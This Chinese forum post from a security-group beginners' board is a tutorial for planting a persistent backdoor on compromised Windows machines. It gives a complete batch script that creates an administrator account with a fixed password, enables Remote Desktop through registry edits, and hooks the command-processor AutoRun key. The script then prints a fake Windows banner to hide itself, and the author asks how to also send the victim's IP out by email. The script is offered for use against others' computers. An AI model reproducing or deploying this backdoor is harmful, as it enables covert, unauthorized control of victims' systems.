|
 | 作者: Winmillion [winmillion]
 论坛用户 |
登录 |
| 大家都知道木马可以留后门吧!可是木马经常被查杀!肉鸡经常飞走! 有没有想过建立一个永久而不被查杀的后门呢? 办法是有的!以下教大家在肉鸡下建立一个批处理后门,当肉鸡打开CMD后批处理就自动创建一个用户并升级为管 理员权限最后自动开启3389后门. 新建一个TXT文本文件输入一下代码 _______________________________________________________________ net user Winmillion 123456 /add net localgroup administrators Winmillion /add echo REGEDIT4>>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg echo "fDenyTSConnections"=dword:00000000>>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg echo "PortNumber"=dword:00000d3d>>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP- Tcp]>>3389.reg echo "PortNumber"=dword:00000d3d>>3389.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor]>>3389.reg echo "AutoRun"="C:\\WINDOWS\\system32\\cmd.bat">>3389.reg regedit /s 3389.reg del 3389.reg cls @echo Microsoft Windows XP [版本 5.1.2600] @echo (C) 版权所有 1985-2001 Microsoft Corp. _______________________________________________________________ 将以上的代码保存为CMD.BAT文件放到C:\WINDOWS\System32\下执行即可! 注意:当你在Win2003服务器运行时要修改下版本号!达到伪装的效果!比如这里是"@echo Microsoft Windows XP [版本 5.1.2600]"那么就要修改成"@echo Microsoft Windows 2003 [版本 5.1.2600]" 这个后门的最大缺点就是没有开机后自动发送肉鸡的外网IP到指定的邮箱,如哪位前辈知道,请通知在下一声!  |
| 地主 发表时间: 09-03-09 18:28 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 每当肉鸡打开CMD后就开启后门